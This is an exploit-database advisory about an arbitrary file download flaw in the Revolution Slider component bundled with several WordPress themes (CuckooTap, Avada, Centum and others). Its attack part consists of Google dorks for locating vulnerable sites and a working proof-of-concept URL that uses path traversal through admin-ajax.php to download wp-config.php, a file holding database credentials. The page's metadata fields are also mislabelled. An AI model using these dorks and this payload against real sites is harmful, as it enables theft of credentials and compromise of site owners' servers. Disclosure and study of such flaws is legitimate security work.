WordPress CuckooTap Theme & eShop Arbitrary File Download

2014-09-01 / 2015-05-15
Risk: High
Local: No
Remote: Yes
CVE: CWE-200
CWE: N/A

# WordPress CuckooTap Theme & eShop Arbitrary File Download # Risk: High # CWE number: CWE-200 # Author: Hugo Santiago # Contact: hugo.s@linuxmail.org # Date: 31/08/2014 # Vendor Homepage: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405 # Tested on: Windows 7 and Gnu/Linux # Google Dork: "Index of" +/wp-content/themes/cuckootap/ # WordPress IncredibleWP Theme Arbitrary File Download # Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/ # Google Dork: "Index of" +/wp-content/themes/IncredibleWP/ # WordPress Ultimatum Theme Arbitrary File Download # Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s # Google Dork: "Index of" +/wp-content/themes/ultimatum # WordPress Medicate Theme Arbitrary File Download # Vendor Homepage: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916 # Google Dork: "Index of" +/wp-content/themes/medicate/ # WordPress Centum Theme Arbitrary File Download # Vendor Homepage: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603 # Google Dork: "Index of" +/wp-content/themes/Centum/ # WordPress Avada Theme Arbitrary File Download # Vendor Homepage: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226 # Google Dork: "Index of" +/wp-content/themes/Avada/ # WordPress Striking Theme & E-Commerce Arbitrary File Download # Vendor Homepage: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763 # Google Dork: "Index of" +/wp-content/themes/striking_r/ # WordPress Beach Apollo Arbitrary File Download # Vendor Homepage: https://www.authenticthemes.com/theme/apollo/ # Google Dork: "Index of" +/wp-content/themes/beach_apollo/ PoC: http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top